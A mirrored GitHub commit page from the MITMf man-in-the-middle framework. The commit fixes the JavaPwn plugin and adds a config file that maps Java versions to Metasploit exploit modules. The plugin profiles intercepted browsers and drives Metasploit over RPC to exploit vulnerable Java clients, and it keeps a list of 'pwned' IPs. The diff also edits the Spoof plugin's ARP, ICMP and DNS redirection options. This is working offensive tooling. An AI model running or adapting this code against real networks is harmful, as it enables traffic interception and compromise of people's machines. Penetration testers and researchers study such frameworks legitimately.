mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-07 13:32:18 -07:00
fixed errors in javapwn plugin and added config file
This commit is contained in:
byt3bl33d3r
parent
9d860437c4
commit
c162833916
3 changed files with 28 additions and 11 deletions
|
|
@ -0,0 +1,5 @@
|
||||||
|
#Example config file for the javapwn plugin
|
||||||
|
1.702 = "java_atomicreferencearray"
|
||||||
|
1.704 = "java_verifier_field_access"
|
||||||
|
1.706 = "java_jre17_exec"
|
||||||
|
1.707 = "java_jre17_jaxws"
|
||||||
|
|
@ -1,13 +1,18 @@
|
||||||
from plugins.plugin import Plugin
|
from plugins.plugin import Plugin
|
||||||
from plugins.BrowserProfiler import BrowserProfiler
|
from plugins.BrowserProfiler import BrowserProfiler
|
||||||
from time import sleep
|
from time import sleep
|
||||||
import libs.msfrpc
|
import libs.msfrpc as msfrpc
|
||||||
import string
|
import string
|
||||||
import random
|
import random
|
||||||
import threading
|
import threading
|
||||||
import logging
|
import logging
|
||||||
import sys, os
|
import sys, os
|
||||||
|
|
||||||
|
try:
|
||||||
|
from configobj import ConfigObj
|
||||||
|
except:
|
||||||
|
sys.exit('[-] configobj library not installed!')
|
||||||
|
|
||||||
class JavaPwn(BrowserProfiler, Plugin):
|
class JavaPwn(BrowserProfiler, Plugin):
|
||||||
name = "JavaPwn"
|
name = "JavaPwn"
|
||||||
optname = "javapwn"
|
optname = "javapwn"
|
||||||
|
|
@ -21,16 +26,20 @@ class JavaPwn(BrowserProfiler, Plugin):
|
||||||
self.msfport = options.msfport
|
self.msfport = options.msfport
|
||||||
self.rpcip = options.rpcip
|
self.rpcip = options.rpcip
|
||||||
self.rpcpass = options.rpcpass
|
self.rpcpass = options.rpcpass
|
||||||
|
self.javapwncfg = options.javapwncfg
|
||||||
|
|
||||||
if not self.msfip:
|
if not self.msfip:
|
||||||
sys.exit('[-] JavaPwn plugin requires --msfip')
|
sys.exit('[-] JavaPwn plugin requires --msfip')
|
||||||
|
|
||||||
|
if not self.javapwncfg:
|
||||||
|
self.javapwncfg = './config_files/javapwn.cfg'
|
||||||
|
|
||||||
#Correlates java versions with their relative exploits
|
self.javacfg = ConfigObj(self.javapwncfg)
|
||||||
self.javaVersionDic = {1.702: "java_atomicreferencearray",
|
|
||||||
1.704: "java_verifier_field_access",
|
self.javaVersionDic = {}
|
||||||
1.706: "java_jre17_exec",
|
for key, value in self.javacfg.iteritems():
|
||||||
1.707: "java_jre17_jaxws"}
|
self.javaVersionDic[float(key)] = value
|
||||||
#add your exploits here converting the max affected java version to a float (e.g. java version 1.7.05 => 1.705)
|
|
||||||
|
|
||||||
self.sploited_ips = [] # store ip of pwned or not vulnarable clients so we don't re-exploit
|
self.sploited_ips = [] # store ip of pwned or not vulnarable clients so we don't re-exploit
|
||||||
|
|
||||||
|
|
@ -39,7 +48,7 @@ class JavaPwn(BrowserProfiler, Plugin):
|
||||||
msf.login('msf', self.rpcpass)
|
msf.login('msf', self.rpcpass)
|
||||||
version = msf.call('core.version')['version']
|
version = msf.call('core.version')['version']
|
||||||
print "[*] Succesfully connected to Metasploit v%s" % version
|
print "[*] Succesfully connected to Metasploit v%s" % version
|
||||||
except:
|
except Exception:
|
||||||
sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server")
|
sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server")
|
||||||
|
|
||||||
#Initialize the BrowserProfiler plugin
|
#Initialize the BrowserProfiler plugin
|
||||||
|
|
@ -166,11 +175,13 @@ class JavaPwn(BrowserProfiler, Plugin):
|
||||||
options.add_argument('--msfport', dest='msfport', default='8080', help='Port of MSF web-server [default: 8080]')
|
options.add_argument('--msfport', dest='msfport', default='8080', help='Port of MSF web-server [default: 8080]')
|
||||||
options.add_argument('--rpcip', dest='rpcip', default='127.0.0.1', help='IP of MSF MSGRPC server [default: localhost]')
|
options.add_argument('--rpcip', dest='rpcip', default='127.0.0.1', help='IP of MSF MSGRPC server [default: localhost]')
|
||||||
options.add_argument('--rpcpass', dest='rpcpass', default='abc123', help='Password for the MSF MSGRPC server [default: abc123]')
|
options.add_argument('--rpcpass', dest='rpcpass', default='abc123', help='Password for the MSF MSGRPC server [default: abc123]')
|
||||||
|
options.add_argument('--javapwncfg', type=file, help='Specify a config file')
|
||||||
|
|
||||||
def finish(self):
|
def finish(self):
|
||||||
'''This will be called when shutting down'''
|
'''This will be called when shutting down'''
|
||||||
msf = msfrpc.Msfrpc({"host": self.rpcip})
|
msf = msfrpc.Msfrpc({"host": self.rpcip})
|
||||||
msf.login('msf', self.rpcpass)
|
msf.login('msf', self.rpcpass)
|
||||||
|
|
||||||
jobs = msf.call('job.list')
|
jobs = msf.call('job.list')
|
||||||
if len(jobs) > 0:
|
if len(jobs) > 0:
|
||||||
print '[*] Stopping all running metasploit jobs'
|
print '[*] Stopping all running metasploit jobs'
|
||||||
|
|
@ -180,5 +191,5 @@ class JavaPwn(BrowserProfiler, Plugin):
|
||||||
consoles = msf.call('console.list')['consoles']
|
consoles = msf.call('console.list')['consoles']
|
||||||
if len(consoles) > 0:
|
if len(consoles) > 0:
|
||||||
print "[*] Closing all virtual consoles"
|
print "[*] Closing all virtual consoles"
|
||||||
for b,i,p in consoles.items():
|
for console in consoles:
|
||||||
msf.call('console.destroy', [i])
|
msf.call('console.destroy', [console['id']])
|
||||||
|
|
|
||||||
|
|
@ -32,6 +32,7 @@ class Spoof(Plugin):
|
||||||
self.arp = options.arp
|
self.arp = options.arp
|
||||||
self.icmp = options.icmp
|
self.icmp = options.icmp
|
||||||
self.dns = options.dns
|
self.dns = options.dns
|
||||||
|
#self.dhcp = options.dhcp
|
||||||
self.domain = options.domain
|
self.domain = options.domain
|
||||||
self.dnsip = options.dnsip
|
self.dnsip = options.dnsip
|
||||||
self.dnscfg = options.dnscfg
|
self.dnscfg = options.dnscfg
|
||||||
|
|
@ -188,7 +189,7 @@ class Spoof(Plugin):
|
||||||
options.add_argument('--arp', dest='arp', action='store_true', default=False, help='Redirect traffic using ARP Spoofing')
|
options.add_argument('--arp', dest='arp', action='store_true', default=False, help='Redirect traffic using ARP Spoofing')
|
||||||
options.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP Redirects')
|
options.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP Redirects')
|
||||||
options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Redirect DNS requests')
|
options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Redirect DNS requests')
|
||||||
#options.add_argument('--dhcp')
|
# options.add_argument('--dhcp', dest='dhcp', action='store_true', default=False, help='Redirect traffic using fake DHCP offers')
|
||||||
options.add_argument('--iface', dest='interface', help='Specify the interface to use')
|
options.add_argument('--iface', dest='interface', help='Specify the interface to use')
|
||||||
options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP')
|
options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP')
|
||||||
options.add_argument('--target', dest='target', help='Specify a host to poison [default: subnet]')
|
options.add_argument('--target', dest='target', help='Specify a host to poison [default: subnet]')
|
||||||
|
|
|
||||||
Loading…
Add table
Add a link
Reference in a new issue